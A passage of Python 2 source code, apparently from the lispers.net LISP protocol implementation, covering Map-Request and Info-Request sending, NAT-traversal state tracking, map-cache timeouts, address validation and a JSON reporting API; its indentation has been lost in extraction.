nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
